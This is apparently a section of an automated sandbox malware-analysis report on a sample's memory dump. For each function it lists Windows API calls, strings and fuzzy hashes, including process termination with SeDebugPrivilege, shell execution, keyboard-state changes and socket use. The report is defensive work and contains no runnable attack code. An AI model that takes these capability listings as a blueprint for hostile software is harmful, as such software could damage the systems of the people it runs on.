                                                                      • Opcode ID: ae2800db83b9ef37a4b3dfde0999cb42cd6ca9616c48c0954135be2cdf15d1e1
                                                                      • Instruction ID: e4f38859743d8005baaf0835633eebbb3e29f6cb61c5c85845eac4f0b97ab818
                                                                      • Opcode Fuzzy Hash: ae2800db83b9ef37a4b3dfde0999cb42cd6ca9616c48c0954135be2cdf15d1e1
                                                                      • Instruction Fuzzy Hash: 72910771D00219EBDB10EFA5DC85EEEBBB9BF48710F10415AF819A7251EB715A44CFA0
                                                                      Function 00596D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00596E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00596E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00596E52
                                                                      • _wcscat.LIBCMT ref: 00596EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00596EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00596EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
                                                                      • Opcode ID: 03b2aaa5875c38a20f6bc6ac9e0809af0cfb7643bd05d5f8a4adedd6c1cc388f
                                                                      • Instruction ID: 1afa2030a3ca59160e76295e712bc005b785d676de721596ef4c1aa55641a382
                                                                      • Opcode Fuzzy Hash: 03b2aaa5875c38a20f6bc6ac9e0809af0cfb7643bd05d5f8a4adedd6c1cc388f
                                                                      • Instruction Fuzzy Hash: 4F418175A00349AFEF219F64CC89BEA7BE8FF08350F11442AF554E7291D6719D889B60
                                                                      Function 0058E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00573C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00573C7A
                                                                        • Part of subcall function 00573C55: Process32FirstW.KERNEL32(00000000,?), ref: 00573C88
                                                                        • Part of subcall function 00573C55: CloseHandle.KERNEL32(00000000), ref: 00573D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058E9A4
                                                                      • GetLastError.KERNEL32 ref: 0058E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0058EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 0058EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0058EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 256fb7752c3686a988a7537eb0b7ab097b0f485bc877b8931b5b890b6aa95c81
                                                                      • Instruction ID: 6c2be9874c79c7247c8a4bbb9c027b1e3c0cf7ac6ba0efcb6f78e3e48222114f
                                                                      • Opcode Fuzzy Hash: 256fb7752c3686a988a7537eb0b7ab097b0f485bc877b8931b5b890b6aa95c81
                                                                      • Instruction Fuzzy Hash: 3541C031200202AFDB14EF14DCAAFADBFA5BF91714F148819F9069B2D2CB74A845DB91
                                                                      Function 00572F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00573033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 25e6d070ac787c9dcf49fce55305cc69740c24e9444f21c0a287e706f03e2208
                                                                      • Instruction ID: b51cefa5944b89e714a04fd193049634c148c0359639172383e5a7dc42fbfac0
                                                                      • Opcode Fuzzy Hash: 25e6d070ac787c9dcf49fce55305cc69740c24e9444f21c0a287e706f03e2208
                                                                      • Instruction Fuzzy Hash: 6511053124C746BEE7149A94EC4BDBB6F9CBF15330F20802EF908A6181EAB15F4076A0
                                                                      Function 005742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00574312
                                                                      • LoadStringW.USER32(00000000), ref: 00574319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057432F
                                                                      • LoadStringW.USER32(00000000), ref: 00574336
                                                                      • _wprintf.LIBCMT ref: 0057435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00574357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 9fba5ea5341ecb6d661cad278451690e40dd106e0c0d13d25725243650f70043
                                                                      • Instruction ID: 09f6c8be622cce8c34bb5545e490eda70d049c54b3b1909ab45dbb7e0ef80afd
                                                                      • Opcode Fuzzy Hash: 9fba5ea5341ecb6d661cad278451690e40dd106e0c0d13d25725243650f70043
                                                                      • Instruction Fuzzy Hash: B80162F7900208BFE7119BA0DD89FF6776CEB08301F0005A6B749E6051EA745E899B71
                                                                      Function 0059D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0059D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0059D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0059D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0059D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0059D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: fe24b3e805c98c24677503dd7ae1e2e29986a83e16fc720233746bbe5d55ab5b
                                                                      • Instruction ID: 02c483bf65801246b2be36542057b3742a154a02b36ae691a1ca7d14e2e0a748
                                                                      • Opcode Fuzzy Hash: fe24b3e805c98c24677503dd7ae1e2e29986a83e16fc720233746bbe5d55ab5b
                                                                      • Instruction Fuzzy Hash: 8BB1897160022AEBDF14CFA8C9C5BBD7BB1FF44701F09806AED489B295D734A954DBA0
                                                                      Function 00512A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 00512ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00512B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 0054C21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 0054C286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 0d848419ad2869f368dbd36aedd1fa71f8810db5a8b32a1bfb25b979e72eb316
                                                                      • Instruction ID: 36556bd04a7dc42eed9accc0e2fc183e58935eab550fac518c59de2e931e45f6
                                                                      • Opcode Fuzzy Hash: 0d848419ad2869f368dbd36aedd1fa71f8810db5a8b32a1bfb25b979e72eb316
                                                                      • Instruction Fuzzy Hash: 21411B352097809AE7758B28CC8CBEB7F92BF95304F248C1AE04786560C6F1A8E5D720
                                                                      Function 005770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 005770DD
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00577114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00577130
                                                                      • _memmove.LIBCMT ref: 0057717E
                                                                      • _memmove.LIBCMT ref: 0057719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 005771AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005771BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 005771DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      • Opcode ID: e131dbb7d2d8c4a5c666629b15aec3c9f36293f7324014d3836f76c5f6ddc255
                                                                      • Instruction ID: 85646761ba12a105f6c1cfc56bd5ba619e00f0561bfc9deccc71eb96747f9c93
                                                                      • Opcode Fuzzy Hash: e131dbb7d2d8c4a5c666629b15aec3c9f36293f7324014d3836f76c5f6ddc255
                                                                      • Instruction Fuzzy Hash: 9F315375900205EBDF00EFA5DC89AAE7B78FF45710F1541A5E904DB256D7309E14EB60
                                                                      Function 005961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 005961EB
                                                                      • GetDC.USER32(00000000), ref: 005961F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005961FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0059620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00596246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00596257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0059902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00596291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005962B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 88a817af2554fad450a83ec9ab200cafed0fa067598ee80494670642140e6887
                                                                      • Instruction ID: 49804c434faf661e9704a74a8240c9b3a3eb655ab8ca01d3844d4ef5f5ef940d
                                                                      • Opcode Fuzzy Hash: 88a817af2554fad450a83ec9ab200cafed0fa067598ee80494670642140e6887
                                                                      • Instruction Fuzzy Hash: 4D317A76200210AFEF108F60DC8AFEA3FADEF5A765F050066FE08DA291C6759855DB60
                                                                      Function 0057EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • _wcstok.LIBCMT ref: 0057EC94
                                                                      • _wcscpy.LIBCMT ref: 0057ED23
                                                                      • _memset.LIBCMT ref: 0057ED56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 774024439-3081909835
                                                                      • Opcode ID: 1f828cbfa49fc4645ae5fa569301911a401649551cd4e11ca1ebba286eca4cd7
                                                                      • Instruction ID: b9690470c2b9f21cc3e698e27f099dab6a6dba605b530fba3eaca57b339b1b00
                                                                      • Opcode Fuzzy Hash: 1f828cbfa49fc4645ae5fa569301911a401649551cd4e11ca1ebba286eca4cd7
                                                                      • Instruction Fuzzy Hash: B2C162715087029FD714EF24D85AE9ABFE4BF89310F00896DF899972A2DB30ED45DB42
                                                                      Function 00586B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00586C00
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00586C21
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586C34
                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00586CEA
                                                                      • inet_ntoa.WSOCK32(?), ref: 00586CA7
                                                                        • Part of subcall function 0056A7E9: _strlen.LIBCMT ref: 0056A7F3
                                                                        • Part of subcall function 0056A7E9: _memmove.LIBCMT ref: 0056A815
                                                                      • _strlen.LIBCMT ref: 00586D44
                                                                      • _memmove.LIBCMT ref: 00586DAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3619996494-0
                                                                      • Opcode ID: 6d22e5aa4e9d5dfc129e60976b7ebe447526ac5a1d3adb22a1b7c095274bf5d9
                                                                      • Instruction ID: 2843c5bf708e6e018d7640e463c540f40357faef12047a10fbc748d17b196f0a
                                                                      • Opcode Fuzzy Hash: 6d22e5aa4e9d5dfc129e60976b7ebe447526ac5a1d3adb22a1b7c095274bf5d9
                                                                      • Instruction Fuzzy Hash: 4381E271208301ABD710FB24CC9AEAABBA8FFD4714F14491CF955AB292DB70ED44CB52
                                                                      Function 00511424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aee55a39749a88aefc236f8b3141ad982a594c4f25dc021980123317db58bda
                                                                      • Instruction ID: 489b3cab3d0cda6bfbe42f86cebab64605fba23926d28395e10844ebc5d2374a
                                                                      • Opcode Fuzzy Hash: 0aee55a39749a88aefc236f8b3141ad982a594c4f25dc021980123317db58bda
                                                                      • Instruction Fuzzy Hash: 74716D34900509EFEF048F58CC48AFEBF79FF85314F148199FA15AA251C774AA91CBA8
                                                                      Function 0059B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(01004C58), ref: 0059B3EB
                                                                      • IsWindowEnabled.USER32(01004C58), ref: 0059B3F7
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0059B4DB
                                                                      • SendMessageW.USER32(01004C58,000000B0,?,?), ref: 0059B512
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0059B54F
                                                                      • GetWindowLongW.USER32(01004C58,000000EC), ref: 0059B571
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059B589
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: e58d90cba0c9ca9c73c817970f3bb46133049a66d5c1e8c0cab8a5d3d44b65bc
                                                                      • Instruction ID: ba1d752fb73d8628ea64a57f6d3c7d51a11827d11506ccf0b23cd5d3cd0335d1
                                                                      • Opcode Fuzzy Hash: e58d90cba0c9ca9c73c817970f3bb46133049a66d5c1e8c0cab8a5d3d44b65bc
                                                                      • Instruction Fuzzy Hash: 7A719E34601204EFFF209F64E994FBA7FBAFF49300F14455AE949972A2D732A850EB50
                                                                      Function 0058F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0058F448
                                                                      • _memset.LIBCMT ref: 0058F511
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0058F556
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • GetProcessId.KERNEL32(00000000), ref: 0058F5CD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0058F5FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                      • String ID: @
                                                                      • API String ID: 3522835683-2766056989
                                                                      • Opcode ID: 89faada5edea683f0f3cd3994632530d2e5dfff8ceb2e3369d28b20642b45280
                                                                      • Instruction ID: 8d4413ea0493e55b199410cc9cc7aefc18a049f50971377fc97074a7c02285c9
                                                                      • Opcode Fuzzy Hash: 89faada5edea683f0f3cd3994632530d2e5dfff8ceb2e3369d28b20642b45280
                                                                      • Instruction Fuzzy Hash: E6619C75A0061A9FCF14EFA4C4959AEBBF5FF89310F148469E855BB351CB30AE41CB90
                                                                      Function 00570F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00570F8C
                                                                      • GetKeyboardState.USER32(?), ref: 00570FA1
                                                                      • SetKeyboardState.USER32(?), ref: 00571002
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00571030
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057104F
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571095
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005710B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
